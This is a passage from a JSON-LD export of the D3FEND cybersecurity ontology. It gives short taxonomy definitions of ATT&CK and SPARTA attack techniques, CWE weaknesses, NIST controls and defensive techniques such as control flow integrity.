        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemCallFiltering"
      },
      "rdfs:label": "AC-3(8)"
    },
    {
      "@id": "d3f:Browser",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web browser (commonly referred to as a browser) is a software application for retrieving, presenting, and traversing information resources on the World Wide Web. An information resource is identified by a Uniform Resource Identifier (URI/URL) and may be a web page, image, video or other piece of content. Hyperlinks present in resources enable users easily to navigate their browsers to related resources. Although browsers are primarily intended to use the World Wide Web, they can also be used to access information provided by web servers in private networks or files in file systems.",
      "d3f:may-contain": {
        "@id": "d3f:BrowserExtension"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Web_browser"
      },
      "rdfs:label": "Browser",
      "rdfs:seeAlso": {
        "@id": "http://wordnet-rdf.princeton.edu/id/13376000-n"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserApplication"
        },
        {
          "@id": "_:N2d9dbe1389004a979305462335c102b7"
        }
      ]
    },
    {
      "@id": "_:N2d9dbe1389004a979305462335c102b7",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BrowserExtension"
      }
    },
    {
      "@id": "d3f:K-FoldCross-Validation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-KFCV",
      "d3f:definition": "Cross-validation is a resampling procedure used to evaluate machine learning models on a limited data sample. The procedure has a single parameter called k that refers to the number of groups that a given data sample is to be split into. As such, the procedure is often called k-fold cross-validation. When a specific value for k is chosen, it may be used in place of k in the reference to the model, such as k=10 becoming 10-fold cross-validation",
      "d3f:kb-article": "## References\nK-Fold Cross-Validation. Machine Learning Mastery.  [Link](https://machinelearningmastery.com/k-fold-cross-validation/#:~:text=Cross%2Dvalidation%20is%20a%20resampling,k%2Dfold%20cross%2Dvalidation).",
      "rdfs:label": "K-Fold Cross-Validation",
      "rdfs:subClassOf": {
        "@id": "d3f:ResamplingEnsemble"
      }
    },
    {
      "@id": "d3f:MemoryModificationEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where a process modifies allocated memory, potentially altering its content, behavior, or state.",
      "rdfs:label": "Memory Modification Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:MemoryEvent"
        },
        {
          "@id": "_:N4f67d661457c481890f3f35e84523346"
        }
      ]
    },
    {
      "@id": "_:N4f67d661457c481890f3f35e84523346",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAllocationEvent"
      }
    },
    {
      "@id": "d3f:T1198",
      "@type": "owl:Class",
      "d3f:attack-id": "T1198",
      "d3f:definition": "In user mode, Windows Authenticode (Citation: Microsoft Authenticode) digital signatures are used to verify a file's origin and integrity, variables that may be used to establish trust in signed code (ex: a driver with a valid Microsoft signature may be handled as safe). The signature validation process is handled via the WinVerifyTrust application programming interface (API) function,  (Citation: Microsoft WinVerifyTrust) which accepts an inquiry and coordinates with the appropriate trust provider, which is responsible for validating parameters of a signature. (Citation: SpectorOps Subverting Trust Sept 2017)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1553.003",
      "rdfs:label": "SIP and Trust Provider Hijacking",
      "rdfs:seeAlso": {
        "@id": "d3f:T1553.003"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1595.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1595.001",
      "d3f:definition": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.",
      "rdfs:label": "Scanning IP Blocks",
      "rdfs:subClassOf": {
        "@id": "d3f:T1595"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SI-2_6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Flaw Remediation | Removal of Previous Versions of Software and Firmware",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:FirmwareVerification"
        },
        {
          "@id": "d3f:PeripheralFirmwareVerification"
        },
        {
          "@id": "d3f:SoftwareUpdate"
        },
        {
          "@id": "d3f:SystemFirmwareVerification"
        }
      ],
      "rdfs:label": "SI-2(6)"
    },
    {
      "@id": "d3f:ImageScannerInputDevice",
      "@type": "owl:Class",
      "d3f:definition": "An image scanner -- often abbreviated to just scanner, is a device that optically scans images, printed text, handwriting or an object and converts it to a digital image. Commonly used in offices are variations of the desktop flatbed scanner where the document is placed on a glass window for scanning. Hand-held scanners, where the device is moved by hand, have evolved from text scanning \"wands\" to 3D scanners used for industrial design, reverse engineering, test and measurement, orthotics, gaming and other applications. Mechanically driven scanners that move the document are typically used for large-format documents, where a flatbed design would be impractical.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Image_scanner"
      },
      "rdfs:label": "Image Scanner Input Device",
      "rdfs:subClassOf": {
        "@id": "d3f:VideoInputDevice"
      },
      "skos:altLabel": "Scanner"
    },
    {
      "@id": "d3f:EX-0010.04",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "EX-0010.04",
      "d3f:definition": "A bootkit positions itself in the pre-OS boot chain so that it executes before normal integrity checks and can shape what the system subsequently trusts. After seizing early control, the bootkit can redirect image selection, patch kernels or flight binaries in memory, adjust device trees and driver tables, or install hooks that persist across warm resets. Some variants maintain shadow copies of legitimate images and present them to basic verification routines while steering actual execution to a modified payload; others manipulate fallback logic so recovery modes load attacker-controlled code. Because the boot path initializes memory maps, buses, and authentication material, a bootkit can also influence key/counter setup and gateway configurations, creating conditions favorable to later tactics. The central characteristic is precedence: by running first, the implant defines the reality higher layers observe, ensuring that every subsequent component launches under conditions curated by the attacker.",
      "d3f:modifies": {
        "@id": "d3f:BootLoader"
      },
      "rdfs:label": "Bootkit - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/EX-0010/04/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:EX-0010"
        },
        {
          "@id": "_:Na9ea6ccf54934dcabed9281ecc13aaf9"
        }
      ],
      "skos:prefLabel": "Bootkit"
    },
    {
      "@id": "_:Na9ea6ccf54934dcabed9281ecc13aaf9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:BootLoader"
      }
    },
    {
      "@id": "d3f:Stacking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-STA",
      "d3f:definition": "Stacking is a method of using the results and predictions from one layer of ML models as inputs to another layer of ML models. Stacking (sometimes called stacked generalization) involves training a model to combine the predictions of several other learning algorithms.",
      "d3f:kb-article": "## References\nEnsemble learning. Wikipedia.  [Link](https://en.wikipedia.org/wiki/Ensemble_learning).",
      "rdfs:label": "Stacking",
      "rdfs:subClassOf": {
        "@id": "d3f:EnsembleLearning"
      }
    },
    {
      "@id": "d3f:CWE-1059",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1059",
      "d3f:definition": "The product does not contain sufficient technical or engineering documentation (whether on paper or in electronic form) that contains descriptions of all the relevant software/hardware elements of the product, such as its usage, structure, architectural components, interfaces, design, implementation, configuration, operation, etc.",
      "rdfs:label": "Insufficient Technical Documentation",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-710"
      }
    },
    {
      "@id": "d3f:CCI-001695_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system prevents the execution of organization-defined unacceptable mobile code.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:ExecutableDenylisting"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2011-10-07T00:00:00"
      },
      "rdfs:label": "CCI-001695"
    },
    {
      "@id": "d3f:Reference-SIA-OSDP-2-2",
      "@type": [
        "owl:NamedIndividual",
        "d3f:SpecificationReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.securityindustry.org/industry-standards/open-supervised-device-protocol/"
      },
      "d3f:kb-abstract": "Open Supervised Device Protocol (OSDP) is an access control communications standard developed by the Security Industry Association (SIA) to improve interoperability among access control and security products.",
      "d3f:kb-author": "Security Industry Association (SIA)",
      "d3f:kb-reference-of": {
        "@id": "d3f:ElectronicLockMonitoring"
      },
      "d3f:kb-reference-title": "Open Supervised Device Protocol (OSDP) v2.2",
      "rdfs:label": "Reference - SIA OSDP v2.2"
    },
    {
      "@id": "d3f:T1552.008",
      "@type": "owl:Class",
      "d3f:attack-id": "T1552.008",
      "d3f:definition": "Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.",
      "rdfs:label": "Chat Messages",
      "rdfs:subClassOf": {
        "@id": "d3f:T1552"
      }
    },
    {
      "@id": "d3f:SubstringMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SM",
      "d3f:definition": "String-searching algorithms, sometimes called string-matching algorithms, are an important class of string algorithms that try to find a place where one or several strings (also called patterns) are found within a larger string or text.",
      "d3f:kb-article": "## References\n1. String-searching algorithm. (2023, April 8). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/String-searching_algorithm)",
      "rdfs:label": "Substring Matching",
      "rdfs:subClassOf": {
        "@id": "d3f:PartialMatching"
      }
    },
    {
      "@id": "d3f:TA0106",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Impair Process Control - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Impair Process Control"
    },
    {
      "@id": "d3f:receives",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x receives y: The subject x acquires object y from a communication medium and transfers y into its local context for storage or processing.",
      "rdfs:label": "receives",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-107",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-107",
      "d3f:definition": "An unused validation form indicates that validation logic is not up-to-date.",
      "rdfs:label": "Struts: Unused Validation Form",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1164"
      }
    },
    {
      "@id": "d3f:T1078.002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.002",
      "d3f:definition": "Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)",
      "d3f:uses": {
        "@id": "d3f:DomainUserAccount"
      },
      "rdfs:label": "Domain Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:Nc681de3a243c4317adaae67cfd216e7b"
        }
      ]
    },
    {
      "@id": "_:Nc681de3a243c4317adaae67cfd216e7b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DomainUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-33",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-33",
      "d3f:definition": "The product uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize '....' (multiple dot) sequences that can resolve to a location that is outside of that directory.",
      "rdfs:label": "Path Traversal: '....' (Multiple Dot)",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-23"
      }
    },
    {
      "@id": "d3f:PeripheralDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving external or auxiliary devices, such as USB drives, Thunderbolt peripherals, or Bluetooth devices. Peripheral events provide visibility into resource availability and potential unauthorized access.",
      "rdfs:label": "Peripheral Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:N53740679e50e4f78bd147e50b47f7dfc"
        }
      ]
    },
    {
      "@id": "_:N53740679e50e4f78bd147e50b47f7dfc",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemovableMediaDevice"
      }
    },
    {
      "@id": "d3f:UserAccountDetachPolicyEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where an IAM policy is detached from a user account.",
      "rdfs:label": "User Account Detach Policy Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:UserAccountEvent"
        },
        {
          "@id": "_:Ne1b29d5a78ea46c2842588af2cb3a299"
        }
      ]
    },
    {
      "@id": "_:Ne1b29d5a78ea46c2842588af2cb3a299",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:preceded-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccountAttachPolicyEvent"
      }
    },
    {
      "@id": "d3f:CWE-767",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-767",
      "d3f:definition": "The product defines a public method that reads or modifies a private variable.",
      "rdfs:label": "Access to Critical Private Variable via Public Method",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:CWE-475",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-475",
      "d3f:definition": "The behavior of this function is undefined unless its control parameter is set to a specific value.",
      "rdfs:label": "Undefined Behavior for Input to API",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-573"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:T1680",
      "@type": "owl:Class",
      "d3f:attack-id": "T1680",
      "d3f:definition": "Adversaries may enumerate local drives, disks, and/or volumes and their attributes like total or free space and volume serial number. This can be done to prepare for ransomware-related encryption, to perform [Lateral Movement](https://attack.mitre.org/tactics/TA0109), or as a precursor to [Direct Volume Access](https://attack.mitre.org/techniques/T1006).",
      "rdfs:label": "Local Storage Discovery",
      "rdfs:subClassOf": {
        "@id": "d3f:DiscoveryTechnique"
      }
    },
    {
      "@id": "d3f:WriteMemory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:modifies": {
        "@id": "d3f:MemoryBlock"
      },
      "rdfs:label": "Write Memory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N27a9a54ec595466a81e39fd4967bec2f"
        }
      ]
    },
    {
      "@id": "_:N27a9a54ec595466a81e39fd4967bec2f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "d3f:DeonticLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-DL",
      "d3f:definition": "Deontic logic addresses the modality of obligations and norms; i.e., the modality of morality.",
      "d3f:kb-article": "## References\n1. Deontic logic. (2023, June 4). In _Wikipedia_. [Link](https://en.wikipedia.org/wiki/Modal_logic#Deontic_logic)",
      "rdfs:label": "Deontic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:ModalLogic"
      }
    },
    {
      "@id": "d3f:ServiceProvider",
      "@type": "owl:Class",
      "d3f:definition": "A service provider offers delivery of intangible outputs such as expertise, support, or access to resources to individuals, organizations, or other entities.",
      "rdfs:label": "Service Provider",
      "rdfs:subClassOf": {
        "@id": "d3f:Provider"
      }
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_MA-6",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Timely Maintenance",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": {
        "@id": "d3f:SoftwareUpdate"
      },
      "rdfs:label": "MA-6"
    },
    {
      "@id": "d3f:T1078.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078.004",
      "d3f:definition": "Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud; alternatively, they may be hybrid-joined between on-premises systems and the cloud through syncing or federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)",
      "d3f:uses": {
        "@id": "d3f:CloudUserAccount"
      },
      "rdfs:label": "Cloud Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1078"
        },
        {
          "@id": "_:N31908ceb446949a4aeea01f0073aee63"
        }
      ]
    },
    {
      "@id": "_:N31908ceb446949a4aeea01f0073aee63",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CloudUserAccount"
      }
    },
    {
      "@id": "d3f:CWE-229",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-229",
      "d3f:definition": "The product does not properly handle when the expected number of values for parameters, fields, or arguments is not provided in input, or if those values are undefined.",
      "rdfs:label": "Improper Handling of Values",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-228"
      }
    },
    {
      "@id": "d3f:CWE-128",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-128",
      "d3f:definition": "Wrap around errors occur whenever a value is incremented past the maximum value for its type and therefore \"wraps around\" to a very small, negative, or undefined value.",
      "rdfs:label": "Wrap-around Error",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:ControlFlowIntegrity",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ControlFlowIntegrity"
      ],
      "d3f:d3fend-id": "D3-CFI",
      "d3f:definition": "Enforcing legal control flow transfers during application process execution.",
      "d3f:enforces": {
        "@id": "d3f:ControlFlowPolicy"
      },
      "d3f:kb-article": "## How it works\n\nControl flow integrity (CFI) restricts the destinations of control flow transfer instructions---particularly indirect function branches such as indirect function calls, jumps, and returns---such that execution can only proceed along paths determined to be valid at compile-time or load-time.\n\nCFI is typically implemented by instrumenting a program during compilation or binary rewriting. A control flow graph is constructed that defines the legitimate targets for each indirect control flow transfer. At runtime, before an indirect branch is taken, a check is performed to ensure that the target address is a member of the allowed target set. If the check fails, a defensive response such as process termination or exception handling is triggered.\n\nImplementations vary in granularity and enforcement mechanism:\n- Compiler-based CFI inserts runtime checks that validate indirect call targets against type or signature-based constraints.\n- Operating system–assisted CFI maintains a bitmap or table of valid indirect call targets and verifies them at runtime before allowing execution to continue.\n- Hardware-assisted CFI enforces control flow integrity using architectural features such as shadow stacks and specific CPU instructions.\n\nBy preventing execution from jumping to attacker-controlled or unintended code locations, CFI mitigates a wide range of exploitation techniques, including return-oriented programming (ROP), jump-oriented programming (JOP), and function pointer overwrite attacks.\n\n## Considerations\n\nWhile control flow integrity significantly raises the bar for control flow hijacking attacks, several considerations affect its effectiveness:\n- Granularity trade-offs: coarse-grained CFI allows larger target sets and may permit some unintended control flow paths, while fine-grained CFI offers stronger guarantees at the cost of performance and complexity.\n- Performance overhead: runtime checks or hardware enforcement may introduce execution overhead, particularly in applications with frequent indirect branches.\n- Compatibility limitations: some legacy code patterns, dynamic code generation, or just-in-time (JIT) compilation workflows may require special handling or reduced CFI enforcement.\n- Data-only attacks: CFI does not prevent attacks that manipulate program behavior without altering control flow, such as logic corruption or data-oriented programming.\n- Bypass techniques: if an attacker can redirect execution to a valid but unintended target within the allowed control flow graph, exploitation may still be possible.\n\nCFI is most effective when combined with complementary defenses such as stack canaries, memory safety checks, address space layout randomization (ASLR), and hardware-backed memory protections.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-IntelControlEnforcementTechnology"
        },
        {
          "@id": "d3f:Reference-LLVMControlFlowIntegrity"
        },
        {
          "@id": "d3f:Reference-MicrosoftControlFlowGuard"
        }
      ],
      "d3f:monitors": [
        {
          "@id": "d3f:CallStack"
        },
        {
          "@id": "d3f:ShadowStack"
        }
      ],
      "d3f:validates": [
        {
          "@id": "d3f:ControlFlowGraph"
        },
        {
          "@id": "d3f:MemoryAddress"
        }
      ],
      "rdfs:label": "Control Flow Integrity",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationHardening"
        },
        {
          "@id": "_:N43c4373ba22e4c529364b1f9903122bf"
        },
        {
          "@id": "_:N484badfc395347a18a7025cb8e3a6540"
        },
        {
          "@id": "_:Ndce575c3a5ad44ada630d00f999b64e9"
        },
        {
          "@id": "_:N1192cd7dc8f942c894c658e48b7abad5"
        },
        {
          "@id": "_:N567559bda3984df0967872f772480aa3"
        }
      ]
    },
    {
      "@id": "_:N43c4373ba22e4c529364b1f9903122bf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enforces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlFlowPolicy"
      }
    },
    {
      "@id": "_:N484badfc395347a18a7025cb8e3a6540",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CallStack"
      }
    },
    {
      "@id": "_:Ndce575c3a5ad44ada630d00f999b64e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ShadowStack"
      }
    },
    {
      "@id": "_:N1192cd7dc8f942c894c658e48b7abad5",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ControlFlowGraph"
      }
    },
    {
      "@id": "_:N567559bda3984df0967872f772480aa3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:validates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryAddress"
      }
    },
    {
      "@id": "d3f:CWE-261",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-261",
      "d3f:definition": "Obscuring a password with a trivial encoding does not protect the password.",
      "rdfs:label": "Weak Encoding for Password",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-522"
      }
    },
    {
      "@id": "d3f:AssetInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:AssetInventory"
      ],
      "d3f:d3fend-id": "D3-AI",
      "d3f:definition": "Asset inventorying identifies and records the organization's assets and enriches each inventory item with knowledge about their vulnerabilities.",
      "d3f:display-order": 1,
      "d3f:enables": {
        "@id": "d3f:Model"
      },
      "d3f:synonym": [
        "Asset Discovery",
        "Asset Inventorying"
      ],
      "rdfs:label": "Asset Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N0ef5dceeae85418b97a81d2e055ad2b6"
        }
      ]
    },
    {
      "@id": "_:N0ef5dceeae85418b97a81d2e055ad2b6",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Model"
      }
    },
    {
      "@id": "d3f:Reference-FileIntegrityMonitoringinMicrosoftDefenderforCloud-Microsoft",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://learn.microsoft.com/en-us/azure/defender-for-cloud/file-integrity-monitoring-overview"
      },
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:FileIntegrityMonitoring"
      },
      "d3f:kb-reference-title": "File Integrity Monitoring in Microsoft Defender for Cloud",
      "rdfs:label": "Reference - File Integrity Monitoring in Microsoft Defender for Cloud - Microsoft"
    },
    {
      "@id": "d3f:CWE-823",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-823",
      "d3f:definition": "The product performs pointer arithmetic on a valid pointer, but it uses an offset that can point outside of the intended range of valid memory locations for the resulting pointer.",
      "d3f:synonym": "Untrusted pointer offset",
      "rdfs:label": "Use of Out-of-range Pointer Offset",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-119"
      }
    },
    {
      "@id": "d3f:Reference-UserActivityFromClearingEventLogs_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2016-04-002/"
      },
      "d3f:kb-abstract": "It is unlikely that event log data would be cleared during normal operations, and it is likely that malicious attackers may try to cover their tracks by clearing an event log. When an event log gets cleared, it is suspicious. Alerting when a \"Clear Event Log\" is generated could point to this intruder technique. Centrally collecting events has the added benefit of making it much harder for attackers to cover their tracks. Event Forwarding permits sources to forward multiple copies of a collected event to multiple collectors, thus enabling redundant event collection. Using a redundant event collection model can minimize the single point of failure risk.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:SystemFileAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2016-04-002: User Activity from Clearing Event Logs",
      "rdfs:label": "Reference - CAR-2016-04-002: User Activity from Clearing Event Logs - MITRE"
    },
    {
      "@id": "d3f:CWE-502",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:cwe-id": "CWE-502",
      "d3f:definition": "The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.",
      "d3f:may-be-weakness-of": {
        "@id": "d3f:UserInputFunction"
      },
      "d3f:synonym": [
        "Marshaling, Unmarshaling",
        "PHP Object Injection",
        "Pickling, Unpickling"
      ],
      "d3f:weakness-of": {
        "@id": "d3f:DeserializationFunction"
      },
      "rdfs:label": "Deserialization of Untrusted Data",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-913"
        },
        {
          "@id": "_:N16db6db794264c63b97a27cf033b2d67"
        },
        {
          "@id": "_:Nb9aa9a532f91477885e5bd88b9137fba"
        }
      ]
    },
    {
      "@id": "_:N16db6db794264c63b97a27cf033b2d67",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-be-weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserInputFunction"
      }
    },
    {
      "@id": "_:Nb9aa9a532f91477885e5bd88b9137fba",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:weakness-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DeserializationFunction"
      }
    },
    {
      "@id": "d3f:DE-0009.01",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0009.01",
      "d3f:definition": "The attacker co-orbits within or near clusters of small objects, matching apparent characteristics (brightness, RCS, tumbling, intermittent emissions) so the vehicle blends with background debris. Dormant periods with minimized attitude control and emissions further the illusion. This posture supports covert inspection, staging for a later intercept, or timing cyber-physical actions (e.g., propulsion or actuator manipulation) to coincide with passages through clutter, increasing the chance that damage or anomalies are attributed to debris strikes rather than deliberate activity. Maintenance of the disguise may involve small, infrequent maneuvers to keep relative motion consistent with “free” debris dynamics.",
      "rdfs:label": "Debris Field - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0009/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0009"
      },
      "skos:prefLabel": "Debris Field"
    },
    {
      "@id": "d3f:CreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:creates": {
        "@id": "d3f:File"
      },
      "d3f:definition": "System call to create a new file on a file system. Some operating systems implement this functionality as part of their d3f:OpenFile system call.",
      "rdfs:label": "Create File",
      "rdfs:seeAlso": [
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfile2"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilea"
        },
        {
          "@id": "https://docs.microsoft.com/en-us/windows/win32/api/fileapi/nf-fileapi-createfilew"
        },
        {
          "@id": "https://linux.die.net/man/2/creat"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N5a5bf46dc69849a08e2c239910a0e71f"
        }
      ]
    },
    {
      "@id": "_:N5a5bf46dc69849a08e2c239910a0e71f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:CWE-427",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-427",
      "d3f:definition": "The product uses a fixed or controlled search path to find resources, but one or more locations in that path can be under the control of unintended actors.",
      "d3f:synonym": [
        "Binary planting",
        "DLL preloading",
        "Dependency confusion",
        "Insecure library loading"
      ],
